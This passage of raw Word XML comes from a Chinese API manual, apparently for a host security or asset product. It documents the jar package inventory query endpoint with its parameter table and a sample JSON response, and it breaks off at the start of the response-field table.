    <w:p w14:paraId="60FA517C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14FCB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F6C7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6461F536" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0917D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4A3A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66B32D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4B512" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD32BCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72448DD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B029C04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E282BBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc115166148"/>
      <w:bookmarkStart w:id="148" w:name="jar包信息查询结果"/>
      <w:r>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="26227C74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询jar包信息，按每台主机每个jar包进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D279D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B571B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jar_pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="66D8AF2E"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262"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="6818"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E49BB3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1C563E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C96A036" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="298D04CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21FDBD09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="350C8F00" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA0089F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F7774DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CADF22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65DEF291" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="606F84B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD6C32C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730A5675" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA3C0C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B27C9A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DC13B3B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3142A4FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C04F35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40AB812A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E870B17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00B9EF6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290A4A62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD46680" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="116CE843" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A1708D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FFE02F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7822F698" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705B28CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7438D79F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B4F3E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48B9DB8B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC3B477" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54EEF5B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E549DE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F3AAADE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59E554E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D28359F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9DCB3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028A98AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0F5966" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型 （1：应用程序，2：系统类库，3:web服务自带库，8：其他依赖包）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DD458FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DF71143" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A5E0E09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254D28D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C23A096" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否可执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D72AED8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766681C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="558CAA85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10768F41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F626969" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63AA7C2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A6673" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jar_pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72E901AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF210A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "rt.jar",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path": "/opt/IBM/WebSphere/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/java/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/rt.jar",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executable": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "1.8.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3475C989"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1250"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5257F77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5C151C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="046B244D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5C4BC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D30446" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2221B9ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13BDDB84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
